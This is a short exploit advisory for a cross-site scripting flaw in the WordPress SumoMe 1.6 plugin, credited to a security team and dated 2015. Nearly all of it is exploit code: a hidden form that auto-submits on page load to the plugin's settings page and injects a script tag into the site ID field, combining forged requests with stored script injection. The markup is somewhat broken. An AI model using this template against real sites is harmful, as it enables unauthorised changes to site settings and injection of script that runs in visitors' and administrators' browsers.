###################### # Exploit Title : Wordpress sumome 1.6 Cross Site Scripting # Exploit Author : Ashiyane Digital Security Team # Vendor Homepage : https://wordpress.org/plugins/sumome/ # Software Link :https://downloads.wordpress.org/plugin/sumome.zip # Date : 2015-01-03 # Tested on : Windows 7 / Mozilla Firefox ###################### ###################### Exploit Code: <html> <body> <style> #test{ display:none; } </style> <div id="test"> <input type='hidden' name='option_page' value='sumome' /><input type="hidden"name="action" value="update" /><input type="hidden" id="_wpnonce"name="_wpnonce" value="934a83b2a9" /><input type="hidden"name="_wp_http_referer"value="/wordpress/wp-admin/options-general.php?page=sumome&settings-updated=true" /> <divclass="sumome-instructions"> <input type="text" name="sumome_site_id" id="sumome_site_id"value='"><script>alert(1)</script>' style="width: 540px" <p class="submit"><input type="submit" name="submit" id="submit"class="button button-primary" value="Save Changes" /></p> </form> </div> ********** function clickin(){ document.getElementById('submit').click() }setTimeout("clickin()",0000); </script> </body> </html>